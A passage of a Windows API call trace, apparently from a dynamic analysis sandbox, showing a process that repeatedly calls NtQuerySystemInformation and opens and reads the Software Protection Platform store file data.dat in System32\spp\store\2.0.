[0178.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x30, ResultLength=0x0) [0178.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x38, ResultLength=0x0) [0178.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x30, ResultLength=0x0) [0178.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff4a0, Length=0x28, ResultLength=0x0) [0178.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff4a0, Length=0x28, ResultLength=0x0) [0178.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1b8, Length=0x40, ResultLength=0x0) [0178.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff120, Length=0x20, ResultLength=0x0) [0178.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.027] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\spp\\store\\2.0\\data.dat.bak" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat.bak")) returned 0xffffffff [0178.156] GetLastError () returned 0x2 [0178.156] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\spp\\store\\2.0\\data.dat.tmp" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat.tmp")) returned 0xffffffff [0178.157] GetLastError () returned 0x2 [0178.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1b8, Length=0x40, ResultLength=0x0) [0178.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0e0, Length=0x28, ResultLength=0x0) [0178.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x20, ResultLength=0x0) [0178.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.158] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\spp\\store\\2.0\\data.dat.bak" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat.bak")) returned 0xffffffff [0178.158] GetLastError () returned 0x2 [0178.158] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\spp\\store\\2.0\\data.dat.tmp" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat.tmp")) returned 0xffffffff [0178.159] GetLastError () returned 0x2 [0178.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0e0, Length=0x28, ResultLength=0x0) [0178.159] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\spp\\store\\2.0\\data.dat" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80000002, hTemplateFile=0x0) returned 0x1e0 [0178.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0e0, Length=0x28, ResultLength=0x0) [0178.160] GetFileSize (in: hFile=0x1e0, lpFileSizeHigh=0xf7a67ff060 | out: lpFileSizeHigh=0xf7a67ff060*=0x0) returned 0x6ba0 [0178.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1b8, Length=0x40, ResultLength=0x0) [0178.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x20, ResultLength=0x0) [0178.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.161] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\spp\\store\\2.0\\data.dat.bak" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat.bak")) returned 0xffffffff [0178.161] GetLastError () returned 0x2 [0178.161] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\spp\\store\\2.0\\data.dat.tmp" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat.tmp")) returned 0xffffffff [0178.161] GetLastError () returned 0x2 [0178.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.162] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\spp\\store\\2.0\\data.dat" (normalized: "c:\\windows\\system32\\spp\\store\\2.0\\data.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80000002, hTemplateFile=0x0) returned 0x1e0 [0178.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.162] GetFileSize (in: hFile=0x1e0, lpFileSizeHigh=0xf7a67ff060 | out: lpFileSizeHigh=0xf7a67ff060*=0x0) returned 0x6ba0 [0178.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.162] ReadFile (in: hFile=0x1e0, lpBuffer=0x27fc8df18f0, nNumberOfBytesToRead=0x6ba0, lpNumberOfBytesRead=0xf7a67ff0b4, lpOverlapped=0x0 | out: lpBuffer=0x27fc8df18f0*, lpNumberOfBytesRead=0xf7a67ff0b4*=0x6ba0, lpOverlapped=0x0) returned 1 [0178.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1b8, Length=0x40, ResultLength=0x0) [0178.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.338] 